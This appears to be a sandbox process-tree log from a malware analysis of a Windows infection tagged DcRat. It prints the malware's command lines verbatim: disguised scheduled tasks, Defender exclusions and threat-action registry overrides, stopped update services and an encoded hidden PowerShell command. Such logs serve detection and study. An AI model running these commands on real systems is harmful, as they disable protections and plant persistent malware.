C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\certreq.exe"C:\Windows\system32\certreq.exe"3⤵
- Checks processor information in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc3⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\34B0.exeC:\Users\Admin\AppData\Local\Temp\34B0.exe2⤵
- DcRat
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\rv2QN3DV.exeC:\Users\Admin\AppData\Local\Temp\IXP017.TMP\rv2QN3DV.exe3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\vj5yq2nu.exeC:\Users\Admin\AppData\Local\Temp\IXP018.TMP\vj5yq2nu.exe4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\Zt7xh7mZ.exeC:\Users\Admin\AppData\Local\Temp\IXP019.TMP\Zt7xh7mZ.exe5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\ns8YA3si.exeC:\Users\Admin\AppData\Local\Temp\IXP021.TMP\ns8YA3si.exe6⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\1Zy08tn7.exeC:\Users\Admin\AppData\Local\Temp\IXP023.TMP\1Zy08tn7.exe7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\2pr394Rk.exeC:\Users\Admin\AppData\Local\Temp\IXP023.TMP\2pr394Rk.exe7⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "8508" "2496" "2300" "2344" "0" "0" "1968" "0" "0" "0" "0" "0"3⤵
-
C:\Users\Admin\AppData\Local\Temp\37CE.exeC:\Users\Admin\AppData\Local\Temp\37CE.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\3E77.exeC:\Users\Admin\AppData\Local\Temp\3E77.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
-
C:\Users\Admin\AppData\Local\Temp\3E77.exe"C:\Users\Admin\AppData\Local\Temp\3E77.exe"3⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Accesses Microsoft Outlook profiles
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3ABD.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\9DCE.exeC:\Users\Admin\AppData\Local\Temp\9DCE.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Users\Admin\AppData\Local\Temp\27C0.exeC:\Users\Admin\AppData\Local\Temp\27C0.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security modification
-
C:\Users\Admin\AppData\Local\Temp\38A9.exeC:\Users\Admin\AppData\Local\Temp\38A9.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\48E6.exeC:\Users\Admin\AppData\Local\Temp\48E6.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\4FFB.exeC:\Users\Admin\AppData\Local\Temp\4FFB.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\5CED.exeC:\Users\Admin\AppData\Local\Temp\5CED.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\certreq.exe"C:\Windows\system32\certreq.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\1Zy08tn7.exeC:\Users\Admin\AppData\Local\Temp\IXP008.TMP\1Zy08tn7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\6e73b20a441c47b6aeadfb18eaaa6773 /t 6248 /p 75481⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AzZVlsx.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AzZVlsx.exe 3Y /GOsite_idCVq 385118 /S1⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
